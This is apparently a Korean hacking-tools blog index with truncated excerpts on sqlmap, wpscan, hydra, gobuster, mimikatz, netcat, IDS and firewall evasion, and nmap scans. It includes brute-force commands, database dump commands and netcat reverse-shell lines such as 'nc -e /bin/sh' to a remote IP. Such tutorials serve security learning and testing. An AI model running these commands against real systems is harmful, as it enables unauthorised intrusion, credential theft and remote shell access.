목록Server Penetesting/Hacking Tool (11)
외로운 Nova의 작업실
- GET 방식 sqlmap -u "http://www.example.com/cat.php?id=1" - Post 방식 sqlmap -u "http://www.example.com/admin/index.php" --data "user=USER&password=PASS" - 옵션 --dbs : 데이터베이스 스캔 -D example --table : 테이블 스캔 -D example -T users --columns : 칼럼 스캔 -D example -T users --dump : 값들 스캔
- wpscan wpscan은 wordexpress 웹페이지의 취약점을 찾아주는 툴입니다. 기본사용법은 아래와 같습니다. wpscan --url {url} - option --disable-tls-checks : tls를 사용하지않습니다. --enumnerate u : 사용하는 user들을 스캔합니다.
hydra는 여러명의 유저를 상대로 여러 패스워드를 사용해서 인증을 시도해 암호를 찾아내는 툴입니다. 간단한 사용법을 알아보겠습니다. - 여러명 유저, 하나의 패스워드 hydra -L username.txt -p 'p@ssw0rd' 10.10.10.10 ssh username.txt는 만들어주시면됩니다. 10.10.10.10의 ssh 서버에 계속 로그인해서 맞는 패스워드가 맞는 유저를 찾아냅니다. - RDP 딕셔너리 공격 hydra -t 1 -V -f -l user -P password.txt rdp://10.10.10.10 -t : 쓰레드수 -V : 자세한 설명 -f : 비밀번호 찾는 즉시 멈춤 -l : 이름 -P : 딕셔너리 파일 - 하나의 아이디, 여러개의 패스워드, http-form 로그인 hyd..
- 기본 사용법 gobuster dir -u http://target-website.com -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 'dir' 명령은 대상 웹사이트 또는 웹 애플리케이션에서 디렉토리 열거를 수행하는 데 사용됩니다. 웹 서버 내의 다양한 디렉토리 및 파일에 HTTP 요청을 전송하여 일반 브라우징을 통해 쉽게 발견할 수 없는 숨겨진 파일, 디렉토리 또는 엔드포인트를 발견하는 방식으로 작동합니다. -u: 검사할 대상 URL 또는 IP 주소를 지정합니다. -w: 스캔에 사용할 단어 목록 파일을 지정합니다. -x: 검사에 포함할 파일 확장자를 지정합니다. -t: 스캔에 사용할 동시 스레드 수를 지정합니다. -k: SSL 인증..
- 설치 https://github.com/ParrotSec/mimikatz GitHub - ParrotSec/mimikatz Contribute to ParrotSec/mimikatz development by creating an account on GitHub. github.com 위 사이트로 들어가서 다운로드하면됩니다. - 개요 Mimikatz는 사용자가 메모리 또는 Windows 운영 체제에서 암호, 해시 및 Kerberos 티켓과 같은 인증 자격 증명을 추출할 수 있는 악용 후 도구입니다. 원래 Windows 운영 체제의 보안 취약점을 입증하기 위한 개념 증명 도구로 개발되었지만 현재는 공격자와 보안 전문가 모두가 보안 평가 및 침투 테스트를 수행하는 데 일반적으로 사용됩니다. Mimikatz..
- nc nc는 바인드 쉘과 리버스 쉘을 할때 많이 사용되는 프로그램입니다. 보통 리눅스에서는 기본으로 설치되어있지만 윈도우는 따로 설치해주셔야합니다. 아래 링크로 들어가서 설치할 수 있습니다. https://eternallybored.org/misc/netcat/ - nc 사용법 nc 192.168.200.1 7979:192.168.200.1에 7979포트에 접속합니다. nc -l -p 7979:7979포트에 listen합니다. nc -e /bin/sh 192.168.220.1 7979 : 192.168.220.1 ip에 7979포트로 쉘프로그램을 연결합니다. nc64 192.132.123.123 -e cmd.exe 7979 : 192.132.123.123 ip에 7979포트로 쉘프로그램을 연결합니다...
- IDS IDS는 네트워크 트래픽과 오용 탐지 기술등을 활용해 해커의 침입을 탐지하는 응용 프로그램입니다. 먼저 IDS가 사용되고 있는지 알아볼 수 있는 방법을 알아보고 하는 일과 우회 기술에대해 알아보겠습니다. - IDS 사용 여부 확인 때떄로 IDS는 역방향 프로브를 보낼때가 있습니다. 따라서 프로브가 오는지 한번 검사해보는 것이 좋습니다. IDS는 갑작스럽게 방화벽을 변경하거나 패킷 응답을 위조합니다. 따라서 패킷응답이 위조되는지 검사해보면 IDS를 사용하는지 알아볼 수 있습니다. nmap의 서비스 스캔으로 ids-monitor와 같은 서비스 명을 찾게된다면 IDS가 있다는 것입니다. IDS는 traceroute에서 응답이 없습니다. traceroute 기능을 사용해서 IDS가 있는지 확인해도 좋..
- 방화벽 방화벽은 패킷들을 검사하는 프로그램입니다. nmap에서는 이런 방화벽의 소개 및 방화벽을 우회할 수 있는 기능들을 갖추고 있습니다. - 방화벽 검사 항목 방화벽이 검사하는 항목은 아래와 같습니다. 출발지 IP 도착지 IP 출발지 Port 도착지 Port 패킷 내의 플래그 경유 IP - 방화벽 우회 방법 방화벽이 검사하는 항목들중 값을 변경해서 방화벽을 우회하는 방법은 출발지 port 조작과 패킷내의 플래그 조작, 경유 IP 조작이 있습니다. 조작하는 방법에 대해서 설명해보겠습니다. -g port번호 : 출발지 port를 설정할 수 있습니다. --scanflags URGACKPSHRSTSYNFIN : 직접 스캔 플래그를 설정(UGR은 긴급, PSH는 버퍼에쌓지말고 바로 전송을 의미) --ip-o..
- OS와 버전 nmap은 기본적으로 타겟으로부터 오는 응답 패킷을 분석하여 상대방의 OS를 스캔합니다. 또한 상대방의 포트를 스캔할때도 응답 패킷을 분석하여 포트를 차지하고 있는 응용 프로그램들의 버전을 스캔합니다. 이는 nmap이 가지고있는 데이터베이스에 의해 가능한 일입니다. - OS와 버전 스캔 예제 아래는 182.119.215.111 호스트의 OS 버전과 많이 사용하는 1000개의 포트만 검사해서 포트를 차지하는 서비스의 버전을 스캔하는 예제입니다. nmap -sV -O --top-ports 1000 182.119.215.111 - OS와 버전 스캔 옵션 -O : Os를 탐지합니다. -sV : 버전 스캔 -A : 원격 OS를 탐지합니다.(-sV, -O 두개 합한것입니다.) IDS에 걸릴확률이 높..
- port 스캔 nmap은 기본적으로 포트 스캔을 수행합니다. 하나의 ip에대해 포트 스캔을 할 수 도있고 복수의 ip에대해서 포트 스캔을 병렬적으로 빠르게 할 수 도 있습니다. - port 스캔 예제 111.111.111.0 ~ 111.111.111.255 에게 핑스캔은 하지않고 443과 25포트에대해 SYN 포트 스캔을 하고 1번포트부터 99번 포트까지는 FIN 포트 스캔을 수행합니다. nmap -Pn -sS443,25 -sF1-99 111.111.111.111/24 - port 스캔 옵션 -sS : SYN 플래그로 스캔을 합니다. -sT : TCP를 사용해서 스캔을 합니다. -sU : UDP를 사용해서 스캔을 합니다. -sA : ACK 플래그로 스캔을 합니다. -sF : FIN 플래그로 스캔을 합..